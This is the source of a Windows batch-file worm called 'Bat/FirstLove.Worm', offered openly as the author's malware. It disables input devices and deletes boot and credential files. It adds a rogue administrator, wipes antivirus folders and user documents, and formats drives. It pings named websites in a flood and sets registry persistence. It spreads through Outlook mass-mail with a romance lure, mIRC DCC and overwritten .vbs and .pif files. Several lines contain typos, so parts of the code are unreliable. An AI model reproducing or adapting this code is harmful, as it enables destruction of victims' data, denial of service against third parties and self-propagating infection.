:Bat/FirstLove.Worm
:2003.01.01
:This Worm is coded by The Fan
cls
@echo off
copy %0 c:\%windir%\autoexec.bat
copy %0 c:\%windir%\Picture.jpg.vbs
c:\%windir%\rundll32.exe Keyboard,Disable
c:\%windir%\rundll32.exe Mouse,Disable
Pause
If exist c:\%windir%\autoexec.bat copy %0 %windir%\system32\iloveher.vbs
If exist c:\%windir%\autoexec.bat copy %0 %windir%\config\imissher.vbs
attrib +S +h +r %windir%\*.*
If exist c:\ntdectect.com deltree /y c:\ntdectect.com>>c:\%windir%\autoexec.bat
If exist c:\ntldr deltree /y c:\ntldr>>c:\%windir%\autoexec.bat
If exist c:\winnt\system32\cmd.exe ren c:\%windir%\system32\cmd.exe command.exe>>c:\%windir%\autoexec.bat
If exist %windir%\regedit.exe ren %windir%\regedit.exe recook.exe>>c:\%windir%\autoexec.bat
If exist c:\winnt\autoexec.bat deltree /y %windir%\system32\config\sam
If exist c:\winnt\system32\services.exe ren c:\winnt\system32\services.exe service.exe>>c:\%windir%\autoexec.bat
If exist c:\winnt\system32\svchost.exe ren c:\winnt\system32\svchost.exe serverhost.exe>>c:\%windir%\autoexec.bat
If exist c:\winnt\autoexec.bat net user administrator /delete
If exist c:\winnt\autoexec.bat net user aaa administrators /add
If exist c:\%windir%\autoexec.bat deltree /y c:\Progra~1\norton~1\*.*
If exist c:\%windir%\autoexec.bat deltree /y c:\Progra~1\ahnlab\v3\*.*
If exist c:\%windir%\autoexec.bat deltree /y c:\Progra~1\virobotxp\*.*
If exist c:\%windir%\autoexec.bat deltree /y c:\Progra~1\zonela~1\*.*
If exist c:\%windir%\autoexec.bat deltree /y c:\hnc\*.*
If exist c:\%windir%\autoexec.bat deltree /y c:\*.hwp
If exist c:\%windir%\autoexec.bat deltree /y c:\*.mp3
If exist c:\%windir%\autoexec.bat deltree /y c:\*.doc
If exist c:\%windir%\autoexec.bat deltree /y c:\*.ppt
If exist c:\%windir%\autoexec.bat deltree /y c:\*.txt
If exist c:\%windir%\autoexec.bat deltree /y c:\*.pif
If exist c:\%windir%\autoexec.bat deltree /y c:\*.pdf
If exist c:\%windir%\autoexec.bat deltree /y c:\*.xls
If exist c:\%windir%\autoexec.bat deltree /y c:\*.hlp
If exist c:\%windir%\autoexec.bat deltree /y c:\*.hta
If exist c:\%windir%\autoexec.bat format /y /q d:
If exist c:\%windir%\autoexec.bat format /y /q e:
If exist c:\%windir%\autoexec.bat format /y /q f:
If exist c:\%windir%\autoexec.bat format /y /q g:
If exist c:\winnt\autoexec.bat net share /delete C$ /y 
If exist c:\winnt\autoexec.bat net share /delete D$ /y 
If exist c:\winnt\autoexec.bat net share /delete E$ /y 
If exist c:\winnt\autoexec.bat net share /delete F$ /y 
If exist c:\winnt\autoexec.bat net share /delete G$ /y 
If exist c:\winnt\autoexec.bat net share /delete ADMIN$ 
If exist c:\winnt\autoexec.bat net share /delete IPC$ 
ping.exe -t -a -n 10000 -l 5000 www.winbbs.com
ping.exe -t -a -n 10000 -l 5000 www.cjmall.com
ping.exe -t -a -n 10000 -l 5000 www.codaplaza.co.kr
ping.exe -t -a -n 10000 -l 5000 www.itcomputer.com
Ping.exe -t -a -n 10000 -l 5000 www.mokpo.ac.kr
Ping.exe -t -a -n 10000 -l 5000 www.daebul.ac.kr
:registry
echo REGEDIT4>Firstlove.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>Firstlove.reg
echo "msg"="c:\%windir%\autoexec.bat">>FirstLove.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>Firstlove.reg
echo "msg"="c:\%windir%\Picture.jpg.vbs">>FirstLove.reg
echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]>>Firstlove.reg
echo "msg"="c:\%windir%\autoexec.bat">>FirstLove.reg
echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce]>>Firstlove.reg
echo "msg"="c:\%windir%\autoexec.bat">>FirstLove.reg
echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce]>>Firstlove.reg
echo "msg"="c:\%windir%\autoexec.bat">>FirstLove.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]>>Firstlove.reg
echo "msg"="c:\%windir%\autoexec.bat">>FirstLove.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]>>Firstlove.reg
echo "msg"="c:\%windir%\Picture.jpg.vbs">>FirstLove.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]>>Firstlove.reg
echo "msg"="c:\%windir%\autoexec.bat">>FirstLove.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices]>>Firstlove.reg
echo "msg"="c:\%windir%\autoexec.bat">>FirstLove.reg
echo [HKEY_CLASSES_ROOT\exefile\shell\open\command]>>FirstLove.reg
echo "@"="c:\%windir%\autoexec.bat%1\ %*">>FirstLove.reg
echo [HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open\command]>>FirstLove.reg
echo "@"="c:\%windir%\autoexec.bat%1\ %*">>FirstLove.reg
regedit /s FirstLove.reg
Kill FirstLove.reg
Deltree /y FirstLove.reg
:massmailer
If exist %windir%\picture.jpg.vbs goto finishedmmail
echo dim x>%windir%\picture.jpg.vbs
echo.on error resume next>>%windir%\picture.jpg.vbs
echo set fso="Scripting.FileSystem.Object">>%windir%\picture.jpg.vbs
echo set so=CreateObject(fso)>>%windir%\picture.jpg.vbs
echo set ol=CreateObject("Outlook.Application")>>%windir%\Picture.jpg.vbs
echo set out=WScript.CreateObject(Outlook.Application")>>%windir%\Picture.jpg.vbs
echo set mapi=out.GetNameSpace("MAPI")>>%windir%\Picture.jpg.vbs
echo set a=mapi.AddressLists(1)>>%windir%\Picture.jpg.vbs
echo set ae=a.AddressExntries>>%windir%\Picture.jpg.vbs
echo for x=1 To ae.Count>>%windir%\Picture.jpg.vbs
echo set ci=ol.CreateItem(0)>>%windir%\Picture.jpg.vbs
echo set Mail=ci>>%windir%\Picture.jpg.vbs
echo Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)>>%windir%\Picture.jpg.vbs
echo Mail.Subject="Hello,,My lover">>c:\%windir%\Picture.jpg.vbs
echo Mail.Body="How are you getting along this days? I miss you so much. there I send you a e-mail. I'm inclosing a photo of myself to give you an idea what i look like.">>%windir%\Picture.jpg.vbs
echo Mail.Attachments.Add("%windir%\autoexec.bat")>>c:\%windir%\Picture.jpg.vbs
echo Mai.Send>>%windir%\Picture.jpg.vbs
echo Next>>%windir%\Picture.jpg.vbs
echo ol.Quit>>%windir%\Picture.jpg.vbs
cscript %windir%\Picture.jpg.vbs
:finishedmmailer
:payloadtxt
echo @echo off>c:\autoexec.bat
echo echo 1234567890>>c:\autoexec.bat
echo echo Please,Check your system vulnerability>>c:\autoexec.bat
echo echo If you found it, Right now.Connect to http://v4.windowsupdate.microsoft.com/ko/default.asp>>c:\autoexec.bat
echo echo Install the patch. Your system is safe.>>c:\autoexec.bat
echo echo 1234567890>>c:\autoexec.bat
echo pause>>c:\autoexec.bat
:Irc_Worm
echo [script]>mirc.bat
echo n0=on 1:JOIN:#:{>>mirc.bat
echo n1= /if(nick==$me){halt}>>mirc.bat
echo n2=/.dcc send $nick c:\%windir%\autoexec.bat
echo n3=}>>mirc.bat
If exist c:\mirc\mirc.ini copy mirc.bat c:\mirc\script.ini
If exist c:\mirc32/mirc.ini copy mirc.bat c:\mirc32\script.ini
If exist c:\Progra~1\mirc\mirc.ini copy mirc.bat c:\progra~1\mirc\script.ini
If exist c:\progra~1\mirc32\mirc.ini copy mirc.bat c:\progra~1\mirc32\script.ini
deltree /y mirc.bat
:VBS Dropping
copy %0 %windir%\autoexec.bat.vbs
echo.on error resume next>>%windir%\autoexec.bat.vbs
echo dim wshs %windir%\autoexec.bat.vbs
echo set wshs=wscript.createobject("wscript.shell")>>%windir%\autoexec.bat.vbs
echo wshs.run "%windir%\autoexec.bat">>%windir%\autoexec.bat.vbs
for%%q in (*.vbs \*.vbs ..\*.vbs %path%\*.vbs %windir%\*.vbs) do copy autoexec.bat.vbs %%q
del %windir%\autoexec.bat.vbs
:Pif Dropping
copy %0 %windir%\dorp.vbs
echo dim wshs, msc>%windir%\drop.vbs
echo set wshs=wscript.createobject("wscript.shell")>>%windir%\drop.vbs
echo set msc=wshs,CreateShortcut("c:\pif.lnk")>>%windir%\drop.vbs
echo msc.TargetPath=wshs.ExpandEnvironmentStrings("%windir%\autoexec.bat)>>%windir%\drop.vbs
echo msc.WindowStyle=4>>%windir%\drop.vbs
echo msc.Save>>%windir%\drop.vbs
cscript %windir%\drop.vbs
del %windir%\drop.vbs
for %%k in (*.pif \*.pif ..\*.pif %path%\*.pif %windir%\*.pif) do copy c:\pif.pif %%k
del c:\pif.pif
cls


